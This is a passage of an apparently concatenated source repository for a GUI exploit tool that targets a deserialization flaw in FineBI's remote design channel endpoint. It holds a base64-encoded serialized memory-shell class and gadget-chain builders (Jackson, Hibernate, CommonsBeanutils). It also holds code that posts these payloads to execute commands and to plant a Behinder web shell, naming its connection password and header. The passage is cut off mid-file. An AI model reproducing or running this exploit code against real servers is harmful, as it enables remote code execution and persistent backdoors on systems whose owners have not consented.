ShMamF2YS9sYW5nL1N0cmluZzspVgEABnJlc3VsdAEACWFkZEZpbHRlcgEACWZpbHRlck1hcAEABXZhcjI3AQAMZmlsdGVyTWFwT2JqAQAEbmFtZQEAEWZpbHRlclN0YXJ0TWV0aG9kAQAOZmluZEZpbHRlck1hcHMBAApmaWx0ZXJNYXBzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEAD3N0YW5kYXJkQ29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACnN0YXRlRmllbGQBABJmaWx0ZXJSZWdpc3RyYXRpb24HAYUBAAdEeW5hbWljAQAMSW5uZXJDbGFzc2VzAQAqTGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uJER5bmFtaWM7AQAOc2VydmxldENvbnRleHQBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0Q29udGV4dDsBAAZmaWx0ZXIBABZMamF2YXgvc2VydmxldC9GaWx0ZXI7AQAKZmlsdGVyTmFtZQEAA3VybAcBhgcBfwcBXAcBhQcBhwcBcQcBiAEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEADU1lbVNoZWxsLmphdmEMAIkAigEAEGU0NWUzMjlmZWI1ZDkyNWIMAIAAgQwBiQGKAQABdQcBiwwBjAGNAQADQUVTBwGODAGPAZABAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAGRAZIMAIkBkwwAnQGUAQARamF2YS91dGlsL0hhc2hNYXAMAZUBlgwAggCDBwGDDAGXAZgMAZkBmgEAFWphdmEubGFuZy5DbGFzc0xvYWRlcgcBmwwBnAGdAQAPamF2YS9sYW5nL0NsYXNzDAGeAK4MAZ8BoAcBhwwBoQGiAQAWc3VuL21pc2MvQkFTRTY0RGVjb2RlcgwBowGkBwGlDAGmAacMAagBqQwBqgGrAQAQamF2YS9sYW5nL09iamVjdAwBrAGtDAGuAa8MAbABsQwBsgGzAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBtAG1DADYANkMAbYBpwEABGV4ZWMMAbcBuAEABGh0dHABABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwBuQG6DAG7AbwMAb0BvgEAB2dldE5vdGUMAb8BoAEAEWphdmEvbGFuZy9JbnRlZ2VyDACJAcABAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nDACHAIUMAIkA4wwAiACFAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQALZ2V0UmVzcG9uc2UBABJbTGphdmEvbGFuZy9DbGFzczsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAwBwQHCDAHDAb4MAbsBxAEACXRleHQvaHRtbAwBxQDjAQAFVVRGLTgMAcYA4wwBxwHIBwHJDAHKAOMMAcsAigwBzACKDAHNAc4BABJldmlsY2xhc3MvTWVtU2hlbGwMAIYAhQwAhACFBwGGDAHPAdABAAdjb250ZXh0AQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvdXRpbC9MaWZlY3ljbGVCYXNlAQAFc3RhdGUHAdEMAdIB0wwB1AHVDADlAdYHAdcMAdgB2QcB2gwB2wHcDAHdAd4BAAtmaWx0ZXJTdGFydAwB3wHTAQAvb3JnLmFwYWNoZS50b21jYXQudXRpbC5kZXNjcmlwdG9yLndlYi5GaWx0ZXJNYXAMAeABnQEAJG9yZy5hcGFjaGUuY2F0YWxpbmEuZGVwbG95LkZpbHRlck1hcAEADWdldEZpbHRlck5hbWUMAeEB4gEAB1N1Y2Nlc3MMAOIA4wEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAVRmlsdGVyIGFscmVhZHkgZXhpc3RzAQACLyoBAAlGUkZpbHRlcnMBAANWaWEBAAVHRmh1YgcB4wwB5AHlAQANMTExMTExMTExMTExMQcB5gwB5wDjDADAAIoMAOUAigEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHmphdmF4L3NlcnZsZXQvU2VydmxldEV4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABBqYXZhL2xhbmcvVGhyZWFkBwHoAQAoamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb24kRHluYW1pYwEAHGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBABNqYXZhL2xhbmcvVGhyb3dhYmxlAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAB5qYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb24BAAhwdXRWYWx1ZQEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAARUWVBFAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAlnZXRSZWFkZXIBABooKUxqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBAAhyZWFkTGluZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAMZGVjb2RlQnVmZmVyAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RvRmluYWwBAAYoW0IpW0IBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAARzaXplAQADKClJAQADZ2V0AQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQAEKEkpVgEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRTdXBlcmNsYXNzAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5zZXRDb250ZW50VHlwZQEAFHNldENoYXJhY3RlckVuY29kaW5nAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFcHJpbnQBAAVmbHVzaAEABWNsb3NlAQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEAFWdldEZpbHRlclJlZ2lzdHJhdGlvbgEANihMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uOwEAIm9yZy9hcGFjaGUvY2F0YWxpbmEvTGlmZWN5Y2xlU3RhdGUBAA1TVEFSVElOR19QUkVQAQAkTG9yZy9hcGFjaGUvY2F0YWxpbmEvTGlmZWN5Y2xlU3RhdGU7AQADc2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWAQBUKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZheC9zZXJ2bGV0L0ZpbHRlcjspTGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uJER5bmFtaWM7AQAcamF2YXgvc2VydmxldC9EaXNwYXRjaGVyVHlwZQEAB1JFUVVFU1QBAB5MamF2YXgvc2VydmxldC9EaXNwYXRjaGVyVHlwZTsBABFqYXZhL3V0aWwvRW51bVNldAEAAm9mAQAlKExqYXZhL2xhbmcvRW51bTspTGphdmEvdXRpbC9FbnVtU2V0OwEAGGFkZE1hcHBpbmdGb3JVcmxQYXR0ZXJucwEAKihMamF2YS91dGlsL0VudW1TZXQ7WltMamF2YS9sYW5nL1N0cmluZzspVgEAB1NUQVJURUQBAAdmb3JOYW1lAQAQZXF1YWxzSWdub3JlQ2FzZQEAFShMamF2YS9sYW5nL1N0cmluZzspWgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAIGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uACEAWgB+AAEAfwAGAAkAgACBAAAACQCCAIMAAAAJAIQAhQAAAAkAhgCFAAAACQCHAIUAAAAJAIgAhQAAAAsAAQCJAIoAAQCLAAAALwABAAEAAAAFKrcAAbEAAAACAIwAAAAGAAEAAAAdAI0AAAAMAAEAAAAFAI4AjwAAAAEAkACRAAIAiwAAAD8AAAADAAAAAbEAAAACAIwAAAAGAAEAAAAsAI0AAAAgAAMAAAABAI4AjwAAAAAAAQCSAJMAAQAAAAEAlACVAAIAlgAAAAQAAQCXAAEAkACYAAIAiwAAAEkAAAAEAAAAAbEAAAACAIwAAAAGAAEAAAAxAI0AAAAqAAQAAAABAI4AjwAAAAAAAQCSAJMAAQAAAAEAmQCaAAIAAAABAJsAnAADAJYAAAAEA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"; public ComboBox Chain; private HttpHost PROXY = null; private String HOST = "127.0.0.1"; private int PORT = 8080; public Menu ProxyLog; @FXML private TitledPane TP; @FXML private TextField cmd; @FXML private TextField url; @FXML private TextArea output; // 初始化 @Override public void initialize(URL location, ResourceBundle resources) { this.TP.setCollapsible(false); this.output.setText("\n1. 本工具仅用于本地模拟环境测试, 适用于FineBI\n\n" + "2. 漏洞路径: /webroot/decision/remote/design/channel\n\n"+ "3. 本工具支持jackson、hibernate、cb反序列化链来进行回显与注入内存马\n\n"+ "4. 利用DNSLOG功能时在输入命令处输入例如:blo6bz.dnslog.cn"); ObservableList chains = FXCollections.observableArrayList(new String[]{"JacksonSignedObject", "Hibernate", "CommonsBeanutils183"}); this.Chain.setItems(chains); } // 注意事项 public void notice(ActionEvent actionEvent) { Alert alert = new Alert(Alert.AlertType.INFORMATION); alert.setTitle("注意事项"); alert.setHeaderText(null); alert.setContentText("\n\n1. 本工具仅用于本地模拟环境测试, 适用于FineBI\n\n" + "2. 漏洞路径: /webroot/decision/remote/design/channel\n\n"+ "3. 本工具支持jackson、hibernate、cb反序列化链来进行回显与注入内存马\n\n"+ "4. 利用DNSLOG功能时在输入命令处输入例如:blo6bz.dnslog.cn\n\n"); alert.showAndWait(); } // 检测是否为空值 public Boolean check(String s){ return !s.isEmpty(); } // 检测url是否合法 public Boolean checkUrl(String url){ return url.contains("https://") || url.contains("http://"); } public byte[] getPayload(String chain,byte[] bytes) throws Exception { if (chain.equals("JacksonSignedObject")){ return JacksonSignedObject.getPayload(bytes); } else if (chain.equals("Hibernate")) { return Hibernate.getPayload(bytes); } else if (chain.equals("CommonsBeanutils183")) { return CommonsBeanutils183.getPayload(bytes); } else { this.output.setText("Please use JacksonSignedObject or Hibernate or CommonsBeanutils183 to ExecCommand || InjectMem "); throw new Exception(); } } // DNSLOG检测 public void DnsLog(ActionEvent actionEvent) throws Exception { if (check(this.url.getText()) && checkUrl(this.url.getText())){ if (check(this.cmd.getText())){ byte[] payload = URLDNS.getPayload(this.cmd.getText()); String res = attack.send(this.url.getText(),payload,null, this.PROXY); this.output.setText("Check on the remote server:"+this.cmd.getText()); } else { this.output.setText("Please Input Cmd !!!\n"+ "Like: blo6bz.dnslog.cn"); } } else { this.output.setText("Please Input Vul Url !!!\n"+ "Like: http://192.168.60.128:37799/webroot/decision/remote/design/channel"); } } // 执行命令 @FXML protected void ExecCommand(ActionEvent actionEvent) throws Exception { if (check(this.url.getText()) && checkUrl(this.url.getText())){ if (check(this.cmd.getText())){ byte[] bytes = Base64.getDecoder().decode(echo); byte[] payload = getPayload((String) this.Chain.getValue(),bytes); String res = attack.send(this.url.getText(),payload,this.cmd.getText(),this.PROXY); this.output.setText(res); } else { this.output.setText("Please Input Cmd !!!"); } } else { this.output.setText("Please Input Vul Url !!!\n"+ "Like: http://192.168.60.128:37799/webroot/decision/remote/design/channel"); } } // 注入内存马 public void InjectMem(ActionEvent actionEvent) throws Exception { if (check(this.url.getText()) && checkUrl(this.url.getText())){ byte[] bytes = Base64.getDecoder().decode(mem); byte[] payload = getPayload((String) this.Chain.getValue(),bytes); String res = attack.send(this.url.getText(),payload,null,this.PROXY); this.output.setText("尝试进行连接====\n1、注入Behinder内存马路径:/*\n2、连接密码:rebeyond\n3、请求头设置:moresec:wuhu\n=========================================\n"+res); } else { this.output.setText("Please Input Vul Url !!!\n"+ "Like: http://192.168.60.128:37799/webroot/decision/remote/design/channel"); } } public void Proxy(ActionEvent actionEvent) { Dialog> dialog = new Dialog<>(); Window window = dialog.getDialogPane().getScene().getWindow(); window.setOnCloseRequest((e) -> { window.hide(); }); dialog.setTitle("Setting Proxy"); dialog.setHeaderText(null); GridPane grid = new GridPane(); grid.setHgap(10); grid.setVgap(20); grid.setPadding(new Insets(20, 30, 10, 10)); ToggleGroup group = new ToggleGroup(); RadioButton enableRadio = new RadioButton("启用"); enableRadio.setSelected(true); enableRadio.setMinWidth(90.0); RadioButton disableRadio = new RadioButton("禁用"); disableRadio.setMinWidth(90.0); enableRadio.setToggleGroup(group); disableRadio.setToggleGroup(group); HBox hbox = new HBox(); hbox.setSpacing(20.0); hbox.getChildren().add(enableRadio); hbox.getChildren().add(disableRadio); ComboBox typeCombo = new ComboBox(); typeCombo.setItems(FXCollections.observableArrayList(new String[]{"HTTP"})); typeCombo.getSelectionModel().select(0); typeCombo.setMinWidth(200); TextField host = new TextField(); TextField port = new TextField(); if (HOST != null){ host.setText(HOST); port.setText(String.valueOf(PORT)); } Button cancelBtn = new Button("退出"); cancelBtn.setMinWidth(90.0); cancelBtn.setOnAction((e) -> { dialog.getDialogPane().getScene().getWindow().hide(); }); Button saveBtn = new Button("保存"); saveBtn.setMinWidth(90.0); saveBtn.setOnAction((e) ->{ if (enableRadio.isSelected()){ // System.out.println(host.getText()); if (!(host.getText().isEmpty() || port.getText().isEmpty())){ HOST = host.getText(); PORT = Integer.parseInt(port.getText()); if (typeCombo.getValue().equals("HTTP")){ HttpHost proxy = new HttpHost(HOST, PORT); this.PROXY = proxy; this.ProxyLog.setText("ProxyLog:Start HTTP @ /"+HOST+":"+PORT+" ..."); } } else { this.ProxyLog.setText("ProxyLog:Please Input Host and Port ..."); } } else { this.ProxyLog.setText(null); HOST = null; this.PROXY = null; } System.out.println(this.PROXY); }); HBox hbox2 = new HBox(); hbox2.getChildren().add(saveBtn); hbox2.getChildren().add(cancelBtn); hbox2.setSpacing(20.0); hbox2.setAlignment(Pos.CENTER); grid.add(hbox,1,0); grid.add(new Label("Type:"), 0, 1); grid.add(typeCombo,1,1); grid.add(new Label("Host:"), 0, 2); grid.add(host, 1, 2); grid.add(new Label("Port:"), 0, 3); grid.add(port, 1, 3); grid.add(hbox2,1,4); dialog.getDialogPane().setContent(grid); dialog.showAndWait(); } } ================================================ FILE: src/main/java/com/example/frchannel/attack.java ================================================ package com.example.frchannel; import org.apache.http.HttpHost; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.config.RequestConfig; import org.apache.http.client.methods.HttpPost; import org.apache.http.conn.ssl.NoopHostnameVerifier; import org.apache.http.conn.ssl.SSLConnectionSocketFactory; import org.apache.http.conn.ssl.TrustSelfSignedStrategy; import org.apache.http.entity.ByteArrayEntity; import org.apache.http.impl.client.HttpClients; import org.apache.http.ssl.SSLContextBuilder; import org.apache.http.util.EntityUtils; import javax.net.ssl.HostnameVerifier; import javax.net.ssl.SSLContext; import java.util.Base64; public class attack { public attack() throws Exception { } // 发送payload public static String send(String url, byte[] bytes, String cmd, HttpHost proxy) throws Exception { HttpClient httpClient = null; if (url.contains("https://")){ SSLContext sslContext = SSLContextBuilder .create() .loadTrustMaterial(new TrustSelfSignedStrategy()) .build(); HostnameVerifier allowAllHosts = new NoopHostnameVerifier(); SSLConnectionSocketFactory connectionFactory = new SSLConnectionSocketFactory(sslContext, allowAllHosts); httpClient = HttpClients.custom() .setSSLSocketFactory(connectionFactory) .build(); } else { httpClient = HttpClients.createDefault(); } HttpPost httpPost = new HttpPost(url); httpPost.setEntity(new ByteArrayEntity(bytes)); // 创建RequestConfig,并设置代理 RequestConfig config = RequestConfig.custom() .setProxy(proxy) .setSocketTimeout(10000) .setConnectTimeout(10000) .build(); // 将RequestConfig配置应用于HttpPost httpPost.setConfig(config); httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"); httpPost.setHeader("Content-Type","gzip"); if (cmd != null){ httpPost.setHeader("Etags",Base64.getEncoder().encodeToString(cmd.getBytes())); } try { HttpResponse response = httpClient.execute(httpPost); return EntityUtils.toString(response.getEntity()); } catch (Exception e) { return e.getMessage(); } } } ================================================ FILE: src/main/java/com/example/frchannel/payload/CommonsBeanutils183.java ================================================ package com.example.frchannel.payload; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.beanutils.BeanComparator; import java.lang.reflect.Constructor; import java.util.Comparator; import java.util.PriorityQueue; public class CommonsBeanutils183 { public static byte[] getPayload(byte[] bytes) throws Exception { TemplatesImpl t = utils.getTeml(bytes); PriorityQueue queue = new PriorityQueue<>(2); queue.add(1); queue.add(2); utils.setFieldValue(queue,"queue",new Object[]{t,2}); Constructor constructor = utils.getConstructor("java.lang.String$CaseInsensitiveComparator"); Comparator comparator = (Comparator) constructor.newInstance(); BeanComparator beanComparator = new BeanComparator("outputProperties",comparator); utils.setFieldValue(queue,"comparator",beanComparator); byte[] ser = utils.serialize(queue); byte[] payload = utils.GzipCompress(ser); return payload; } } ================================================ FILE: src/main/java/com/example/frchannel/payload/Hibernate.java ================================================ package com.example.frchannel.payload; import com.fr.third.org.hibernate.engine.spi.TypedValue; import com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer; import com.fr.third.org.hibernate.type.Type; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.util.HashMap; public class Hibernate { public static byte[] getPayload(byte[] bytes) throws Exception { Class componentTypeClass = Class.forName("com.fr.third.org.hibernate.type.ComponentType"); Class pojoComponentTuplizerClass = Class.forName("com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer"); Class abstractComponentTuplizerClass = Class.forName("com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer"); // 生成包含恶意类字节码的 TemplatesImpl 类 TemplatesImpl tmpl = utils.getTeml(bytes); Method method = TemplatesImpl.class.getDeclaredMethod("getOutputProperties"); Object getter; try { // 创建 GetterMethodImpl 实例,用来触发 TemplatesImpl 的 getOutputProperties 方法 Class getterImpl = Class.forName("com.fr.third.org.hibernate.property.access.spi.GetterMethodImpl"); Constructor constructor = getterImpl.getDeclaredConstructors()[0]; constructor.setAccessible(true); getter = constructor.newInstance(null, null, method); } catch (Exception ignored) { // 创建 BasicGetter 实例,用来触发 TemplatesImpl 的 getOutputProperties 方法 Class basicGetter = Class.forName("com.fr.third.org.hibernate.property.BasicPropertyAccessor$BasicGetter"); Constructor constructor = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class); constructor.setAccessible(true); getter = constructor.newInstance(tmpl.getClass(), method, "outputProperties"); } Object getters = Array.newInstance(getter.getClass(), 1); Array.set(getters, 0, getter); // 创建 